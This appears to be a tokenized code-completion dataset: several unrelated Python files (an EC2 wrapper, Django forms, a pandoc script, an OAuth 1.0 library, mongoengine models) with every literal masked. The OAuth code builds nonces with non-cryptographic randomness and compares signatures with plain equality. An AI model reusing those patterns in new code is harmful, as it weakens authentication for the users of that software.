'<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' <EOL> } <EOL> CONFIGURE = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> NOTFOUND_HTML = b"""<STR_LIT>""" </s>
<s> </s>
<s> import boto <EOL> import boto . ec2 <EOL> import boto . ec2 . blockdevicemapping <EOL> import socket <EOL> import time <EOL> from strider . common . instance_data import InstanceData , SshData <EOL> import strider . common . logger <EOL> class EC2 ( object ) : <EOL> def __init__ ( self , name = None , region = None , access_key_id = None , <EOL> secret_access_key = None , security_token = None , image_id = None , <EOL> instance_type = None , key_name = None , security_groups = None , subnet_id = None , <EOL> ssh = None , user_data = None , tags = None , instance_profile_name = None , <EOL> block_device_map = None , bake_name = None , bake_description = None , <EOL> profile_name = None ) : <EOL> self . name = name <EOL> self . region = region <EOL> self . access_key_id = access_key_id <EOL> self . region = region <EOL> self . secret_access_key = secret_access_key <EOL> self . security_token = security_token <EOL> self . image_id = image_id <EOL> self . instance_type = instance_type <EOL> self . key_name = key_name <EOL> self . security_groups = security_groups <EOL> self . subnet_id = subnet_id <EOL> self . ssh = ssh <EOL> self . user_data = user_data <EOL> self . tags = tags <EOL> self . instance_profile_name = instance_profile_name <EOL> self . block_device_map = block_device_map <EOL> self . bake_name = bake_name <EOL> self . bake_description = bake_description <EOL> self . profile_name = profile_name <EOL> self . log = strider . utils . logger . get_logger ( '<STR_LIT>' ) <EOL> if not self . name : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if not self . instance_type : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if self . tags and type ( self . tags ) != dict : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if type ( self . ssh ) != dict : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if not self . security_groups : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . tags [ '<STR_LIT:Name>' ] = self . name <EOL> self . block_device_map = self . 
_transform_block_device_map ( ) <EOL> self . connection = self . _connect ( ) <EOL> def exists ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . describe ( ) . present <EOL> def describe ( self ) : <EOL> """<STR_LIT>""" <EOL> details = self . _details ( ) <EOL> if details is None : <EOL> return InstanceData ( present = False ) <EOL> else : <EOL> username = self . ssh [ '<STR_LIT:username>' ] <EOL> private_key_path = self . ssh [ '<STR_LIT>' ] <EOL> public_ip = self . ssh . get ( '<STR_LIT>' , True ) <EOL> port = self . ssh . get ( '<STR_LIT:port>' , <NUM_LIT> ) <EOL> host = details . ip_address <EOL> if not public_ip : <EOL> host = details . private_ip_address <EOL> ssh_data = SshData ( keyfile = private_key_path , user = username , host = host , port = port ) <EOL> return InstanceData ( present = True , provider_specific = details , ssh = ssh_data ) <EOL> def bake ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> instance_id = self . describe ( ) . provider_specific . id <EOL> ami_id = self . connection . create_image ( instance_id , self . bake_name , <EOL> self . bake_description , no_reboot = True , <EOL> block_device_mapping = self . block_device_map ) <EOL> self . log ( "<STR_LIT>" % ami_id ) <EOL> return ami_id <EOL> def up ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> me = self . describe ( ) . provider_specific <EOL> if me is None : <EOL> self . log ( "<STR_LIT>" ) <EOL> reservation = self . connection . run_instances ( <EOL> image_id = self . image_id , min_count = <NUM_LIT:1> , max_count = <NUM_LIT:1> , <EOL> key_name = self . key_name , user_data = self . user_data , <EOL> addressing_type = None , subnet_id = self . subnet_id , <EOL> instance_type = self . instance_type , <EOL> instance_profile_name = self . instance_profile_name , <EOL> security_group_ids = self . security_groups , <EOL> block_device_map = self . block_device_map <EOL> ) <EOL> self . log ( "<STR_LIT>" ) <EOL> self . 
_tag_instances ( reservation ) <EOL> self . _start_instances ( reservation ) <EOL> else : <EOL> self . log ( "<STR_LIT>" ) <EOL> self . connection . start_instances ( [ me . id ] ) <EOL> me = self . describe ( ) <EOL> if not me . present : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> me = self . describe ( ) <EOL> if me . present : <EOL> self . log ( "<STR_LIT>" ) <EOL> self . connection . terminate_instances ( instance_ids = [ me . provider_specific . id ] ) <EOL> self . log ( "<STR_LIT>" ) <EOL> else : <EOL> self . log ( "<STR_LIT>" ) <EOL> def _connect ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> conn = boto . ec2 . connect_to_region ( <EOL> self . region , <EOL> aws_access_key_id = self . access_key_id , <EOL> aws_secret_access_key = self . secret_access_key , <EOL> security_token = self . security_token , <EOL> profile_name = self . profile_name <EOL> ) <EOL> self . log ( "<STR_LIT>" ) <EOL> return conn <EOL> def _details ( self ) : <EOL> """<STR_LIT>""" <EOL> reservations = self . connection . get_all_instances ( <EOL> instance_ids = None , filters = None , dry_run = False , max_results = None ) <EOL> for reservation in reservations : <EOL> for instance in reservation . instances : <EOL> if "<STR_LIT:Name>" in instance . tags and instance . tags [ "<STR_LIT:Name>" ] == self . name : <EOL> if instance . state not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return instance <EOL> return None <EOL> def _start_instances ( self , reservation ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> instance_ids = [ x . id for x in reservation . instances ] <EOL> self . connection . start_instances ( instance_ids , dry_run = False ) <EOL> self . log ( "<STR_LIT>" % instance_ids ) <EOL> while True : <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> reservations = self . connection . 
get_all_instances ( instance_ids = instance_ids ) <EOL> for reservation in reservations : <EOL> for instance in reservation . instances : <EOL> if instance . state == '<STR_LIT>' : <EOL> self . log ( "<STR_LIT>" ) <EOL> return <EOL> def _transform_block_device_map ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . block_device_map is None : <EOL> return None <EOL> bdm = boto . ec2 . blockdevicemapping . BlockDeviceMapping ( ) <EOL> for ( k , v ) in self . block_device_map . iteritems ( ) : <EOL> bdm [ k ] = boto . ec2 . blockdevicemapping . EBSBlockDeviceType ( ) <EOL> bdm [ k ] . size = v [ '<STR_LIT:size>' ] <EOL> for prop in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if prop in v : <EOL> self . log ( "<STR_LIT>" % ( prop , v [ prop ] ) ) <EOL> setattr ( bdm [ k ] , prop , v [ prop ] ) <EOL> return bdm <EOL> def _tag_instances ( self , reservation ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" % self . tags ) <EOL> for instance in reservation . instances : <EOL> self . connection . create_tags ( [ instance . id ] , self . tags ) <EOL> self . log ( "<STR_LIT>" ) </s>
<s> from django import forms <EOL> from hackday . users . models import User , UserProfile <EOL> from hackday . teams . models import Team <EOL> from hackday . voting . moremodels import Category , TYPE <EOL> class UserChoiceField ( forms . ModelChoiceField ) : <EOL> def label_from_instance ( self , user ) : <EOL> return "<STR_LIT>" . format ( user . first_name , user . last_name ) <EOL> class UserMultipleChoiceField ( forms . ModelMultipleChoiceField ) : <EOL> def label_from_instance ( self , user ) : <EOL> return "<STR_LIT>" . format ( user . first_name , user . last_name ) <EOL> class BaseTeamForm ( forms . ModelForm ) : <EOL> captain = UserChoiceField ( queryset = User . objects . filter ( <EOL> is_active = True ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> members = UserMultipleChoiceField ( queryset = User . objects . filter ( <EOL> is_active = True ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> category = forms . ModelChoiceField ( queryset = Category . objects . filter ( <EOL> type = TYPE . JUDGED ) . order_by ( "<STR_LIT:name>" ) ) <EOL> class Meta : <EOL> model = Team <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ) <EOL> abstract = True <EOL> class CreateTeamForm ( BaseTeamForm ) : <EOL> pass <EOL> class UpdateTeamForm ( BaseTeamForm ) : <EOL> pass </s>
<s> import pandoc <EOL> import os <EOL> pandoc . core . PANDOC_PATH = '<STR_LIT>' <EOL> doc = pandoc . Document ( ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> doc . markdown = f . read ( ) <EOL> f = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> f . write ( doc . rst ) <EOL> f . close ( ) <EOL> os . system ( '<STR_LIT>' ) <EOL> os . remove ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import urllib <EOL> import time <EOL> import random <EOL> import urlparse <EOL> import hmac <EOL> import binascii <EOL> import httplib2 <EOL> try : <EOL> from urlparse import parse_qs , parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qs , parse_qsl <EOL> VERSION = '<STR_LIT:1.0>' <EOL> HTTP_METHOD = '<STR_LIT:GET>' <EOL> SIGNATURE_METHOD = '<STR_LIT>' <EOL> class Error ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = '<STR_LIT>' ) : <EOL> self . _message = message <EOL> @ property <EOL> def message ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _message <EOL> def __str__ ( self ) : <EOL> return self . _message <EOL> class MissingSignature ( Error ) : <EOL> pass <EOL> def build_authenticate_header ( realm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : '<STR_LIT>' % realm } <EOL> def escape ( s ) : <EOL> """<STR_LIT>""" <EOL> return urllib . quote ( s , safe = '<STR_LIT>' ) <EOL> def generate_timestamp ( ) : <EOL> """<STR_LIT>""" <EOL> return int ( time . time ( ) ) <EOL> def generate_nonce ( length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( [ str ( random . randint ( <NUM_LIT:0> , <NUM_LIT:9> ) ) for i in range ( length ) ] ) <EOL> def generate_verifier ( length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( [ str ( random . randint ( <NUM_LIT:0> , <NUM_LIT:9> ) ) for i in range ( length ) ] ) <EOL> class Consumer ( object ) : <EOL> """<STR_LIT>""" <EOL> key = None <EOL> secret = None <EOL> def __init__ ( self , key , secret ) : <EOL> self . key = key <EOL> self . secret = secret <EOL> if self . key is None or self . secret is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : self . key , <EOL> '<STR_LIT>' : self . secret <EOL> } <EOL> return urllib . 
urlencode ( data ) <EOL> class Token ( object ) : <EOL> """<STR_LIT>""" <EOL> key = None <EOL> secret = None <EOL> callback = None <EOL> callback_confirmed = None <EOL> verifier = None <EOL> def __init__ ( self , key , secret ) : <EOL> self . key = key <EOL> self . secret = secret <EOL> if self . key is None or self . secret is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def set_callback ( self , callback ) : <EOL> self . callback = callback <EOL> self . callback_confirmed = '<STR_LIT:true>' <EOL> def set_verifier ( self , verifier = None ) : <EOL> if verifier is not None : <EOL> self . verifier = verifier <EOL> else : <EOL> self . verifier = generate_verifier ( ) <EOL> def get_callback_url ( self ) : <EOL> if self . callback and self . verifier : <EOL> parts = urlparse . urlparse ( self . callback ) <EOL> scheme , netloc , path , params , query , fragment = parts [ : <NUM_LIT:6> ] <EOL> if query : <EOL> query = '<STR_LIT>' % ( query , self . verifier ) <EOL> else : <EOL> query = '<STR_LIT>' % self . verifier <EOL> return urlparse . urlunparse ( ( scheme , netloc , path , params , <EOL> query , fragment ) ) <EOL> return self . callback <EOL> def to_string ( self ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> '<STR_LIT>' : self . key , <EOL> '<STR_LIT>' : self . secret , <EOL> } <EOL> if self . callback_confirmed is not None : <EOL> data [ '<STR_LIT>' ] = self . callback_confirmed <EOL> return urllib . 
urlencode ( data ) <EOL> @ staticmethod <EOL> def from_string ( s ) : <EOL> """<STR_LIT>""" <EOL> if not len ( s ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> params = parse_qs ( s , keep_blank_values = False ) <EOL> if not len ( params ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> key = params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except Exception : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> secret = params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except Exception : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> token = Token ( key , secret ) <EOL> try : <EOL> token . callback_confirmed = params [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> return token <EOL> def __str__ ( self ) : <EOL> return self . to_string ( ) <EOL> def setter ( attr ) : <EOL> name = attr . __name__ <EOL> def getter ( self ) : <EOL> try : <EOL> return self . __dict__ [ name ] <EOL> except KeyError : <EOL> raise AttributeError ( name ) <EOL> def deleter ( self ) : <EOL> del self . __dict__ [ name ] <EOL> return property ( getter , attr , deleter ) <EOL> class Request ( dict ) : <EOL> """<STR_LIT>""" <EOL> version = VERSION <EOL> def __init__ ( self , method = HTTP_METHOD , url = None , parameters = None ) : <EOL> self . method = method <EOL> self . url = url <EOL> if parameters is not None : <EOL> self . update ( parameters ) <EOL> @ setter <EOL> def url ( self , value ) : <EOL> self . __dict__ [ '<STR_LIT:url>' ] = value <EOL> if value is not None : <EOL> scheme , netloc , path , params , query , fragment = urlparse . urlparse ( value ) <EOL> if scheme == '<STR_LIT:http>' and netloc [ - <NUM_LIT:3> : ] == '<STR_LIT>' : <EOL> netloc = netloc [ : - <NUM_LIT:3> ] <EOL> elif scheme == '<STR_LIT>' and netloc [ - <NUM_LIT:4> : ] == '<STR_LIT>' : <EOL> netloc = netloc [ : - <NUM_LIT:4> ] <EOL> if scheme not in ( '<STR_LIT:http>' , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" % ( value , scheme ) ) <EOL> self . 
normalized_url = urlparse . urlunparse ( ( scheme , netloc , path , None , None , None ) ) <EOL> else : <EOL> self . normalized_url = None <EOL> self . __dict__ [ '<STR_LIT:url>' ] = None <EOL> @ setter <EOL> def method ( self , value ) : <EOL> self . __dict__ [ '<STR_LIT>' ] = value . upper ( ) <EOL> def _get_timestamp_nonce ( self ) : <EOL> return self [ '<STR_LIT>' ] , self [ '<STR_LIT>' ] <EOL> def get_nonoauth_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( [ ( k , v ) for k , v in self . iteritems ( ) <EOL> if not k . startswith ( '<STR_LIT>' ) ] ) <EOL> def to_header ( self , realm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> oauth_params = ( ( k , v ) for k , v in self . items ( ) <EOL> if k . startswith ( '<STR_LIT>' ) ) <EOL> stringy_params = ( ( k , escape ( str ( v ) ) ) for k , v in oauth_params ) <EOL> header_params = ( '<STR_LIT>' % ( k , v ) for k , v in stringy_params ) <EOL> params_header = '<STR_LIT:U+002CU+0020>' . join ( header_params ) <EOL> auth_header = '<STR_LIT>' % realm <EOL> if params_header : <EOL> auth_header = "<STR_LIT>" % ( auth_header , params_header ) <EOL> return { '<STR_LIT>' : auth_header } <EOL> def to_postdata ( self ) : <EOL> """<STR_LIT>""" <EOL> return urllib . urlencode ( self , True ) <EOL> def to_url ( self ) : <EOL> """<STR_LIT>""" <EOL> base_url = urlparse . urlparse ( self . url ) <EOL> query = parse_qs ( base_url . query ) <EOL> for k , v in self . items ( ) : <EOL> query . setdefault ( k , [ ] ) . append ( v ) <EOL> url = ( base_url . scheme , base_url . netloc , base_url . path , base_url . params , <EOL> urllib . urlencode ( query , True ) , base_url . fragment ) <EOL> return urlparse . urlunparse ( url ) <EOL> def get_parameter ( self , parameter ) : <EOL> ret = self . get ( parameter ) <EOL> if ret is None : <EOL> raise Error ( '<STR_LIT>' % parameter ) <EOL> return ret <EOL> def get_normalized_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> for key , value in self . 
iteritems ( ) : <EOL> if key == '<STR_LIT>' : <EOL> continue <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> items . extend ( ( key , item ) for item in value ) <EOL> else : <EOL> items . append ( ( key , value ) ) <EOL> query = urlparse . urlparse ( self . url ) [ <NUM_LIT:4> ] <EOL> items . extend ( self . _split_url_string ( query ) . items ( ) ) <EOL> encoded_str = urllib . urlencode ( sorted ( items ) ) <EOL> return encoded_str . replace ( '<STR_LIT:+>' , '<STR_LIT>' ) <EOL> def sign_request ( self , signature_method , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in self : <EOL> self [ '<STR_LIT>' ] = consumer . key <EOL> if token and '<STR_LIT>' not in self : <EOL> self [ '<STR_LIT>' ] = token . key <EOL> self [ '<STR_LIT>' ] = signature_method . name <EOL> self [ '<STR_LIT>' ] = signature_method . sign ( self , consumer , token ) <EOL> @ classmethod <EOL> def make_timestamp ( cls ) : <EOL> """<STR_LIT>""" <EOL> return str ( int ( time . time ( ) ) ) <EOL> @ classmethod <EOL> def make_nonce ( cls ) : <EOL> """<STR_LIT>""" <EOL> return str ( random . randint ( <NUM_LIT:0> , <NUM_LIT> ) ) <EOL> @ classmethod <EOL> def from_request ( cls , http_method , http_url , headers = None , parameters = None , <EOL> query_string = None ) : <EOL> """<STR_LIT>""" <EOL> if parameters is None : <EOL> parameters = { } <EOL> if headers and '<STR_LIT>' in headers : <EOL> auth_header = headers [ '<STR_LIT>' ] <EOL> if auth_header [ : <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> auth_header = auth_header [ <NUM_LIT:6> : ] <EOL> try : <EOL> header_params = cls . _split_header ( auth_header ) <EOL> parameters . update ( header_params ) <EOL> except : <EOL> raise Error ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if query_string : <EOL> query_params = cls . _split_url_string ( query_string ) <EOL> parameters . update ( query_params ) <EOL> param_str = urlparse . urlparse ( http_url ) [ <NUM_LIT:4> ] <EOL> url_params = cls . 
_split_url_string ( param_str ) <EOL> parameters . update ( url_params ) <EOL> if parameters : <EOL> return cls ( http_method , http_url , parameters ) <EOL> return None <EOL> @ classmethod <EOL> def from_consumer_and_token ( cls , consumer , token = None , <EOL> http_method = HTTP_METHOD , http_url = None , parameters = None ) : <EOL> if not parameters : <EOL> parameters = { } <EOL> defaults = { <EOL> '<STR_LIT>' : consumer . key , <EOL> '<STR_LIT>' : cls . make_timestamp ( ) , <EOL> '<STR_LIT>' : cls . make_nonce ( ) , <EOL> '<STR_LIT>' : cls . version , <EOL> } <EOL> defaults . update ( parameters ) <EOL> parameters = defaults <EOL> if token : <EOL> parameters [ '<STR_LIT>' ] = token . key <EOL> if token . verifier : <EOL> parameters [ '<STR_LIT>' ] = token . verifier <EOL> return Request ( http_method , http_url , parameters ) <EOL> @ classmethod <EOL> def from_token_and_callback ( cls , token , callback = None , <EOL> http_method = HTTP_METHOD , http_url = None , parameters = None ) : <EOL> if not parameters : <EOL> parameters = { } <EOL> parameters [ '<STR_LIT>' ] = token . key <EOL> if callback : <EOL> parameters [ '<STR_LIT>' ] = callback <EOL> return cls ( http_method , http_url , parameters ) <EOL> @ staticmethod <EOL> def _split_header ( header ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> parts = header . split ( '<STR_LIT:U+002C>' ) <EOL> for param in parts : <EOL> if param . find ( '<STR_LIT>' ) > - <NUM_LIT:1> : <EOL> continue <EOL> param = param . strip ( ) <EOL> param_parts = param . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> params [ param_parts [ <NUM_LIT:0> ] ] = urllib . unquote ( param_parts [ <NUM_LIT:1> ] . strip ( '<STR_LIT>' ) ) <EOL> return params <EOL> @ staticmethod <EOL> def _split_url_string ( param_str ) : <EOL> """<STR_LIT>""" <EOL> parameters = parse_qs ( param_str , keep_blank_values = False ) <EOL> for k , v in parameters . iteritems ( ) : <EOL> parameters [ k ] = urllib . 
unquote ( v [ <NUM_LIT:0> ] ) <EOL> return parameters <EOL> class Server ( object ) : <EOL> """<STR_LIT>""" <EOL> timestamp_threshold = <NUM_LIT> <EOL> version = VERSION <EOL> signature_methods = None <EOL> def __init__ ( self , signature_methods = None ) : <EOL> self . signature_methods = signature_methods or { } <EOL> def add_signature_method ( self , signature_method ) : <EOL> self . signature_methods [ signature_method . name ] = signature_method <EOL> return self . signature_methods <EOL> def verify_request ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> version = self . _get_version ( request ) <EOL> self . _check_signature ( request , consumer , token ) <EOL> parameters = request . get_nonoauth_parameters ( ) <EOL> return parameters <EOL> def build_authenticate_header ( self , realm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : '<STR_LIT>' % realm } <EOL> def _get_version ( self , request ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> version = request . get_parameter ( '<STR_LIT>' ) <EOL> except : <EOL> version = VERSION <EOL> if version and version != self . version : <EOL> raise Error ( '<STR_LIT>' % str ( version ) ) <EOL> return version <EOL> def _get_signature_method ( self , request ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> signature_method = request . get_parameter ( '<STR_LIT>' ) <EOL> except : <EOL> signature_method = SIGNATURE_METHOD <EOL> try : <EOL> signature_method = self . signature_methods [ signature_method ] <EOL> except : <EOL> signature_method_names = '<STR_LIT:U+002CU+0020>' . join ( self . signature_methods . keys ( ) ) <EOL> raise Error ( '<STR_LIT>' % ( signature_method , signature_method_names ) ) <EOL> return signature_method <EOL> def _get_verifier ( self , request ) : <EOL> return request . get_parameter ( '<STR_LIT>' ) <EOL> def _check_signature ( self , request , consumer , token ) : <EOL> timestamp , nonce = request . _get_timestamp_nonce ( ) <EOL> self . 
_check_timestamp ( timestamp ) <EOL> signature_method = self . _get_signature_method ( request ) <EOL> try : <EOL> signature = request . get_parameter ( '<STR_LIT>' ) <EOL> except : <EOL> raise MissingSignature ( '<STR_LIT>' ) <EOL> valid = signature_method . check ( request , consumer , token , signature ) <EOL> if not valid : <EOL> key , base = signature_method . signing_base ( request , consumer , token ) <EOL> raise Error ( '<STR_LIT>' <EOL> '<STR_LIT>' % base ) <EOL> built = signature_method . sign ( request , consumer , token ) <EOL> def _check_timestamp ( self , timestamp ) : <EOL> """<STR_LIT>""" <EOL> timestamp = int ( timestamp ) <EOL> now = int ( time . time ( ) ) <EOL> lapsed = now - timestamp <EOL> if lapsed > self . timestamp_threshold : <EOL> raise Error ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( timestamp , now , self . timestamp_threshold ) ) <EOL> class Client ( httplib2 . Http ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , consumer , token = None , cache = None , timeout = None , <EOL> proxy_info = None ) : <EOL> if consumer is not None and not isinstance ( consumer , Consumer ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if token is not None and not isinstance ( token , Token ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . consumer = consumer <EOL> self . token = token <EOL> self . method = SignatureMethod_HMAC_SHA1 ( ) <EOL> httplib2 . Http . __init__ ( self , cache = cache , timeout = timeout , <EOL> proxy_info = proxy_info ) <EOL> def set_signature_method ( self , method ) : <EOL> if not isinstance ( method , SignatureMethod ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . method = method <EOL> def request ( self , uri , method = "<STR_LIT:GET>" , body = None , headers = None , <EOL> redirections = httplib2 . DEFAULT_MAX_REDIRECTS , connection_type = None ) : <EOL> DEFAULT_CONTENT_TYPE = '<STR_LIT>' <EOL> if not isinstance ( headers , dict ) : <EOL> headers = { } <EOL> is_multipart = method == '<STR_LIT:POST>' and headers . 
get ( '<STR_LIT:Content-Type>' , DEFAULT_CONTENT_TYPE ) != DEFAULT_CONTENT_TYPE <EOL> if body and method == "<STR_LIT:POST>" and not is_multipart : <EOL> parameters = dict ( parse_qsl ( body ) ) <EOL> else : <EOL> parameters = None <EOL> req = Request . from_consumer_and_token ( self . consumer , token = self . token , <EOL> http_method = method , http_url = uri , parameters = parameters ) <EOL> req . sign_request ( self . method , self . consumer , self . token ) <EOL> if method == "<STR_LIT:POST>" : <EOL> headers [ '<STR_LIT:Content-Type>' ] = headers . get ( '<STR_LIT:Content-Type>' , DEFAULT_CONTENT_TYPE ) <EOL> if is_multipart : <EOL> headers . update ( req . to_header ( ) ) <EOL> else : <EOL> body = req . to_postdata ( ) <EOL> elif method == "<STR_LIT:GET>" : <EOL> uri = req . to_url ( ) <EOL> else : <EOL> headers . update ( req . to_header ( ) ) <EOL> return httplib2 . Http . request ( self , uri , method = method , body = body , <EOL> headers = headers , redirections = redirections , <EOL> connection_type = connection_type ) <EOL> class SignatureMethod ( object ) : <EOL> """<STR_LIT>""" <EOL> def signing_base ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def sign ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def check ( self , request , consumer , token , signature ) : <EOL> """<STR_LIT>""" <EOL> built = self . sign ( request , consumer , token ) <EOL> return built == signature <EOL> class SignatureMethod_HMAC_SHA1 ( SignatureMethod ) : <EOL> name = '<STR_LIT>' <EOL> def signing_base ( self , request , consumer , token ) : <EOL> sig = ( <EOL> escape ( request . method ) , <EOL> escape ( request . normalized_url ) , <EOL> escape ( request . get_normalized_parameters ( ) ) , <EOL> ) <EOL> key = '<STR_LIT>' % escape ( consumer . secret ) <EOL> if token : <EOL> key += escape ( token . secret ) <EOL> raw = '<STR_LIT:&>' . 
join ( sig ) <EOL> return key , raw <EOL> def sign ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> key , raw = self . signing_base ( request , consumer , token ) <EOL> try : <EOL> from hashlib import sha1 as sha <EOL> except ImportError : <EOL> import sha <EOL> hashed = hmac . new ( key , raw , sha ) <EOL> return binascii . b2a_base64 ( hashed . digest ( ) ) [ : - <NUM_LIT:1> ] <EOL> class SignatureMethod_PLAINTEXT ( SignatureMethod ) : <EOL> name = '<STR_LIT>' <EOL> def signing_base ( self , request , consumer , token ) : <EOL> """<STR_LIT>""" <EOL> sig = '<STR_LIT>' % escape ( consumer . secret ) <EOL> if token : <EOL> sig = sig + escape ( token . secret ) <EOL> return sig , sig <EOL> def sign ( self , request , consumer , token ) : <EOL> key , raw = self . signing_base ( request , consumer , token ) <EOL> return raw </s>
<s> from __future__ import unicode_literals <EOL> import six <EOL> from flask . ext . mongoengine import Document <EOL> from mongoengine import ( <EOL> BooleanField , <EOL> CASCADE , <EOL> DateTimeField , <EOL> DictField , <EOL> IntField , <EOL> ListField , <EOL> ReferenceField , <EOL> StringField <EOL> ) <EOL> from vulyk . models . user import User <EOL> class Batch ( Document ) : <EOL> id = StringField ( max_length = <NUM_LIT:50> , primary_key = True ) <EOL> task_type = StringField ( max_length = <NUM_LIT:50> , required = True , db_field = '<STR_LIT>' ) <EOL> tasks_count = IntField ( default = <NUM_LIT:0> , required = True , db_field = '<STR_LIT>' ) <EOL> tasks_processed = IntField ( default = <NUM_LIT:0> , db_field = '<STR_LIT>' ) <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> def __unicode__ ( self ) : <EOL> return six . text_type ( self . id ) <EOL> def __str__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . 
